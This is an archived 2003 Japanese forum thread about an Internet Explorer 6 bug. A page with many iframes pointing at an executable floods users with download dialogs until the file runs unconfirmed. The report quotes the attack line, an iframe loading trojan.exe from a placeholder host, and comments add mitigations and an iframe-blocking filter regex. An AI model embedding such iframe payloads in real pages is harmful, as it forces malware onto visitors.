Oliverによる
2003年05月19日 4時26分の掲載
げっぷ部門より。
げっぷ部門より。
jbeef曰く、"5月16日のセキュリティホールmemoでもとりあげられているように、IE 6にバグがあり、<iframe src="http://example.com/trojan.exe">などが無数に書かれたHTMLページにアクセスすると、ダウンロードした trojan.exe が確認なしに起動してしまうという。Nimda級のワームに悪用されるおそれがあり危険だ。
実際に試してみたところ、最初は「ファイルのダウンロード」確認ウィンドウが現れて「開く」「保存」「キャンセル」を選択させられるが、これが大量に開いて、いわゆるブラクラ状態となる。ここで急いでWindowsのタスクマネージャを開いてプロセスを終了させようとしても、間に合わず、ついにはなぜか、ダウンロードしたプログラムが起動してしまった。
回避方法として、ブラクラ状態になったら即座にネットワークケーブルを外すことが有効のように見えた。ダウンロードがそれ以上進まなくなるからだ。ただしそれで常に避けられるかはわからない。
根本的な解決のためには、そもそも大量のウィンドウが現れること自体を防ぐべきではなかろうか。同時処理数に上限を設けないことは、ある意味美しい設計ではある(組み込み機器にありがちな上限固定設計に比べて)のだが、ブラクラを防ぐために上限を設けるのはどうだろうか。"
この議論は賞味期限が過ぎたので、保存されている。
新たにコメントを書くことはできない。
|
|
ほかにも… (スコア:5, 興味深い)
同感なんですが、根本的なハナシ、
この動作が、大量処理を強要した結果、ダイアログの応答を誤認して、ある意味正常にダウンロード対象を保存し実行まで処理を継続してしまうのなら、ブラクラ攻撃以外にも大きな脆弱性が存在したりしませんかね?
IEにとどまらず、もしかしたらダイアログAPI、果てはウインドウ管理そのもの、の問題かも…。ダイアログを大量に出すように任意のアプリケーションを誘導できさえすれば、誤動作に導けそうな気がしてしまいます。
みんつ
Re:ほかにも… (スコア:3, 参考になる)
で、失敗時の-1を"開く"を選択したと誤認すると……
いや、今回のこれがそうだとは思いませんが。
親コメント
Re:ほかにも… (スコア:2, 参考になる)
たぶん ダイアログの応答誤認ってのは違うと思う
親コメント
試してないんですが、 (スコア:3, 参考になる)
この機能を利用してると、Irvineが立ち上がってなくてもIEのダウンロードダイアログが完全に殺される(=代わりにIrvineが立ち上がってキューにURLを入れる)んですが。
# これ、ときどき.exe形式のカウンターが引っかかったりしますが:(
# エロサイトだとdial.exeみたいなのがキューに入れられたりも。
試しにMozilla Firebirdで (スコア:2, 参考になる)
ファイルを保存するか問うダイアログが一度出て、「キャンセル」するとそれっきりでした。
ただ、WindowにはJPEGファイルが破損したような画像が表示されました。
不思議なのは、リロードする度にこの画像が違うこと(画像サイズは同じ)。
何をしようとしたんでしょう? >火の鳥さん
Re:試しにMac 0S X+IE5.2で (スコア:3, 参考になる)
Mac版のIEとWin版のIEって、中身は全く別物かと思ってたんですけど、こういうこともあるんですね。
というわけで、Macユーザーも警戒して下さい。
# これを機会に、完全にSafariに乗り換えるのもいいかも
親コメント
みんなでやってみよー (スコア:2, 興味深い)
これじゃや「やってくれ」と言わんばかり…
回避方法って...
これ回避方法とは呼べないでしょう。
LANコードなんてそう簡単に抜けないと思うし
正直リセットの方が効果的だと思う。
それを承知なら使う方が間違っているという結論になりますが…
#タブPCにCtrl+Alt+Delキーなる便利なキーがあったなー(遠い目)
いかなる脆弱性が発見されても放置されるIE (スコア:2, 参考になる)
このような脆弱性が発見されても平気で…
そうではない人はセキュリティーに無頓着なので
このような脆弱性が発見されても平気で
例えばいまだにMS01-020のパッチすら当たっていない人もいるくらいでして…
結局
MSIEは今まで深刻な脆弱性をいくつも発見されていますが
普及しているにも関わらず他のソフトの脆弱性発見に比べて
騒がれないものです。
企業によってはMSIEの使用を禁止しているようですが、許可しているところでも
オフィス内のヘビーユーザーはMozillaユーザーだったりします。
MSIEの脆弱性が発見されてもMSIEを使わないヘビーユーザーは
対岸の火事のような感覚で受け止めるため、
自分には関係がないということで情報を集めず、
オフィスに警鐘を鳴らすこともなく、何の動きもなく月日が経過しがちです。
そして忘れたころに脆弱性を突くウィルスが登場して
オフィスが一気に汚染されてしまうパターン。
MSIEのバグで深刻なのは、その個々のバグの内容よりも、
何が起きても放置されがちな背景にあると思われます。
IEやOEに対するパッチが出たあと長期間パッチを当てずに放置した人が
沢山いたために流行した事例はKlezやFrethemなど沢山あります。
「なぜ今ごろこんな古い脆弱性を突くウィルスが?」
という問題は今の状況が変わらない限りこれからも続くでしょう。
日本のオフィス内でMSIEが脆弱になってしまう大きな原因に
「最初から入っている」
という点があるでしょう。
Mozilla, Operaのような後からインストールされるツールは
ユーザーが自分の意思と自分の作業でインストールするため、
そこにセキュリティーホールがあると入れた自分の責任になってしまいます。
そのため、インストールしたあとセキュリティー情報に興味を持ちやすくなり、
また自分の手間で入れたために愛着もわくことになり、
そういう理由から自然に安全性は向上します。
しかしMSIEのように「最初から入っている」「自分が入れたのではない」となると、
脆弱性によって何が起きても自分の責任ではないということで、
それどころか下手にパッチを当てて問題が起きたら自分の責任になるということで、
事なかれ主義の日本人サラリーマンは
パッチを当てず「そのまま」の状態で放置することが当り前になります。
コンピューター技術を売りとしていないオフィスや
忙しいオフィスではそれが顕著です。
「何も行動を起こさないのは何よりも悪い」という文化の地域もあるようですが
大抵の日本人には受け入れられず、
「私がやったのではないので責任はない」というエクスキューズがあると
日本人はすぐそちらに飛びつきます。
そういったことから、パッチなしMSIEが大量に潜んでおり、
アンチウィルスソフトがそれを誤魔化している、というのが今の日本のオフィスです。
「原則禁止。使いたい場合は、手抜きして既に入っているものを使うのではなく
新しくダウンロードし、継続的に新しいパッチを追いかける」
などと条件をつけない限り、
オフィス内でMSIEを使用することに安全性はないと思われます。
Re:いかなる脆弱性が発見されても放置されるIE (スコア:2, 参考になる)
やはりこういった場合、導入コストを考えてI初期導入済みのMSブラウザを対象としてしまっているのが現状です。(下手をするとパッチレベルまで指定する事もあるようです。)
これに伴い、個人的に利用しているブラウザでは社内システムが動かないなどの弊害によりMSブラウザに依存せざる得ない方も多いのではと思いますが。。。
本来であれば、そういったセキュリティレベルまで考慮したシステム開発が必要なのでしょうが納期や費用の問題もあり現状でとりあえずMSブラウザでOKとしてしまっている部分も多いです。
まぁ、本来は自分の身を守るという意味で、インターネット接続と社内システムでブラウザを変更すれば問題ないのでしょうが。。。
セキュリティに詳しい人がどの程度社内にいるかの問題と、セキュリティ問題に対する啓蒙(社内的なもの)がどの程度行うことができるかという問題もあると思われます。(コストの面も大きいですが。。)
ただこの話も、開発する側の問題なのかもしれませんが。。
bamb_t
親コメント
LANケーブルを抜くって..... (スコア:1, 興味深い)
これ、内蔵無線LANの場合はどうしたら良いんでしょう?
まぁ、タブブラウザソフトでタブ数の上限をかけても良いんでしょうけど。
Re:LANケーブルを抜くって..... (スコア:3, 参考になる)
>
> これ、内蔵無線LANの場合はどうしたら良いんでしょう?
んと、Win2K,XPなら、即座にCtrl+Alt+Delからタスクマネージャーを起動して、IEを殺すのが有効っぽい。
#うちのPCでは間に合った。 <つか、やるなw
まあ、そのままシャットダウンしたほうが良いかな?
> まぁ、タブブラウザソフトでタブ数の上限をかけても良いんでしょうけど。
これ、だめぽ。
あれはJavaScriptで開かれるウィンドウに対してのみ有効みたいで、
ダイアログみたいなのはタブにならないからだめみたい。
(少なくとも、Sleipnirではだめだった)
親コメント
Re:LANケーブルを抜くって..... (スコア:3, 参考になる)
参考までに、Ctrl+Shift+Esc で直接タスクマネージャを
起動できます。
親コメント
こうすればいいのに (スコア:1, 興味深い)
「ウインドウの数が設定数を超えました。処理を続行しますか?」
みたいに聞いてきてくれればありがたいなぁ。
タブブラウザの窓数抑止は、エ○画像を大量に開きまくってたらすぐ超えるから設定してないし…
Re:こうすればいいのに (スコア:2, すばらしい洞察)
「ウインドウの数が設定数を超えました。処理を続行しますか?」
と質問するダイアログの数が上限を超えて誤動作するのですよ。多分。
親コメント
ナチュラルな回避方法? (スコア:1)
嬉しいような、悲しいような・・・。
おふとぴ (スコア:1)
作ってたら教えてくだされ~。
# 「iFrame/iLayer to link」で効くかと思ったが駄目だった...
--------------------
/* SHADOWFIRE */
Re:おふとぴ (スコア:3, 参考になる)
「範囲のマッチ (Bounds)」のところを
<i(frame|layer)\s*>(</i(frame|layer)>|)
に変更するといけました。お試しください。
試すときはキャッシュを削除した方がいいかも。
親コメント
判らない用語 (スコア:1, すばらしい洞察)
一般的な用語なのかな。
#はづかすぃのでAC
修正が出たようですね。 (スコア:1)
しかし,発見から修正まで三週間以上か。「緊急」のわりには対応が遅かったな。
Re:とりあえず (スコア:1)
変わらず、再現しますねぇ....
親コメント
Re:有限なものを扱うのに制限が無い事自体が間違い。 (スコア:1)
いちいち例外的な状況に対処するためのコードを書くのは面倒なので。
「例外処理をちゃんと書かないプログラミングは駄目」と言うのは簡単ですが、プログラミングの手間を減らす道具であるプログラミング言語やライブラリの側でどうにかならないものでしょうか。
鵜呑みにしてみる?
親コメント
Re:有限なものを扱うのに制限が無い事自体が間違い。 (スコア:1)
> それ以上のリソース消費を許容しちまうプログラムって~
>事自体が悪!
なるほどそのようなリソース消費を許容してしまう
Windowsというプログラム自体が悪であると(笑)。
でもPCで使えるOSでリソース消費を制限できるものってのは
少ないような気がしますが、あるものなのでしょうか??
#Solaris+ResourceManagerとやらで出来た気がするけど
#CPUがいっぱい必要だし(笑)。
親コメント
IEキャッシュから実行権を剥奪する (スコア:1, すばらしい洞察)
「フォルダのスキャン/ファイル実行」拒否を追加したら
家では、プログラムの起動は失敗してくれるみたいよ、
この制限掛けると何か不具合在るだろか?
親コメント